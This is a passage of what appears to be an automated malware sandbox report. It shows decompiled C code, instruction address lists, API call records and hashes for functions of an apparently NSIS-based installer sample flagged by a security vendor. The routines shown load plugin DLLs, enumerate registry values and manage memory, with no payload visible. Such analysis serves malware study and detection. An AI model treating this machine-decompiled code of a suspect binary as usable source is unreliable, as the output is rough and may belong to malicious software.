												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00407068
0x00407068
0x0040706c
0x00407095
0x0040709f
0x0040706e
0x00407077
0x00407084
0x00407087
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x004073cb
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a320");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406AA4(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E004056CA(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce58, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403CB7( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x004020d8
0x004020d8
0x004020dd
0x004020e4
0x004021a3
0x004022f1
0x004022f1
0x00402c2a
0x00402c2d
0x00402c39
0x00402c39
0x004020f3
0x004020fd
0x00402100
0x00402110
0x00402114
0x0040211a
0x0040211c
0x0040211f
0x0040219c
0x00000000
0x0040219c
0x00402121
0x0040212c
0x00402130
0x00402170
0x00402132
0x00402135
0x00402138
0x00402164
0x0040213a
0x0040213d
0x00402146
0x00402148
0x00402148
0x00402146
0x00402138
0x00402178
0x00402191
0x00402191
0x00000000
0x00402178
0x00402103
0x0040210b
0x0040210e
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103

Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,004030A8), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: eacc7f29ef9238f75312dc60e6ea6028a018b8bf669bd73802a6ecb2e4004895
Instruction ID: 1e7e134340f86907485d462c64894228b35b3344cd4f3d252167f9901203d809
Opcode Fuzzy Hash: eacc7f29ef9238f75312dc60e6ea6028a018b8bf669bd73802a6ecb2e4004895
Instruction Fuzzy Hash: C521C231904104FADF11AFA5CF48A9D7A70BF48354F60413BF605B91E0DBBD8A929A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401B9B(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				char* _t32;
				void* _t33;
				void* _t34;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x28));
				_t33 =  *0x40ce58; // 0x5cb890
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E004066A5(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
						_t12 =  *0x40ce58; // 0x5cb890
						 *_t34 = _t12;
						 *0x40ce58 = _t34;
					} else {
						if(_t33 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t33 + 4; // 0x5cb894
							E00406668(_t30, _t3);
							_push(_t33);
							 *0x40ce58 =  *_t33;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t33 == _t28) {
							break;
						}
						_t33 =  *_t33;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t33 == _t28) {
								break;
							} else {
								_t36 = _t33 + 4;
								_t32 = L"Call";
								E00406668(_t32, _t33 + 4);
								_t22 =  *0x40ce58; // 0x5cb890
								E00406668(_t36, _t22 + 4);
								_t25 =  *0x40ce58; // 0x5cb890
								_push(_t32);
								_push(_t25 + 4);
								E00406668();
								L15:
								 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E004066A5(_t28, _t30, _t33, _t28, 0xffffffe8));
					E00405CC8();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}

0x00401b9b
0x00401b9b
0x00401b9e
0x00401ba6
0x00401bef
0x00401c1d
0x00401c26
0x00401c28
0x00401c2c
0x00401c31
0x00401c36
0x00401c38
0x00401bf1
0x00401bf3
0x0040292e
0x00401bf9
0x00401bf9
0x00401bfe
0x00401c05
0x00401c06
0x00401c0b
0x00401c0b
0x00401bf3
0x00000000
0x00401ba8
0x00401ba8
0x00401ba8
0x00401bab
0x00000000
0x00000000
0x00401bb1
0x00401bb5
0x00000000
0x00401bb7
0x00401bb9
0x00000000
0x00401bbf
0x00401bbf
0x00401bc2
0x00401bc9
0x00401bce
0x00401bd8
0x00401bdd
0x00401be2
0x00401be6
0x00402a94
0x00402c2a
0x00402c2d
0x00402c33
0x00402c33
0x00401bb9
0x00000000
0x00401bb5
0x0040238a
0x00402397
0x00402398
0x0040239d
0x0040239d
0x00402c35
0x00402c39

APIs

GlobalFree.KERNEL32(005CB890), ref: 00401C0B
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D

Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,00000000), ref: 004068A4

Strings

Call, xrefs: 00401BC2, 00401BC8, 00401BE2

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Global$AllocFreelstrcatlstrlen
String ID: Call
API String ID: 3292104215-1824292864
Opcode ID: 3f020652b54f4aff84369af85c552add0977b8bccae4eada2093d63fb928b3c4
Instruction ID: d74cddccbdd50a14e5bf5e3e63826a63b2a65df0fd836753f00777670cd3b466
Opcode Fuzzy Hash: 3f020652b54f4aff84369af85c552add0977b8bccae4eada2093d63fb928b3c4
Instruction Fuzzy Hash: 5321D872904210DBDB20EFA4DEC4E5E73A4AB047157150A3BF542F72D0D6BD9C518BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				short* _t22;
				void* _t24;
				void* _t26;
				void* _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402DE6(_t29, 0x20019); // executed
				_t24 = _t9;
				_t10 = E00402D84(3);
				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
				 *__edi = __ebx;
				if(_t24 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t24, _t10, __edi, 0x3ff);
					}
					_t22[0x3ff] = _t16;
					_push(_t24); // executed
					RegCloseKey(); // executed
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x0040259e
0x0040259e
0x0040259e
0x004025a3
0x004025aa
0x004025ac
0x004025b4
0x004025b7
0x004025ba
0x0040292e
0x004025c0
0x004025c8
0x004025cb
0x004025e4
0x004025ea
0x004025ec
0x004025ee
0x004025ee
0x004025cd
0x004025d1
0x004025d1
0x004025f5
0x004025fc
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
RegEnumValueW.KERNELBASE(00000000,00000000,?,?), ref: 004025E4
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse53CA.tmp,00000000,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: a1dccb7ad5de8b03bade15b30a27ed1347f7b9d3a9e9f0d0aeacb5a18eef0a99
Instruction ID: fdd171a53236be04b49e80cc8c25aaf428e2db1c32e81cf7e645575326a8d696
Opcode Fuzzy Hash: a1dccb7ad5de8b03bade15b30a27ed1347f7b9d3a9e9f0d0aeacb5a18eef0a99
Instruction Fuzzy Hash: 35017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61D0EBB85E45966D

Uniqueness

Uniqueness Score: -1.00%

Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
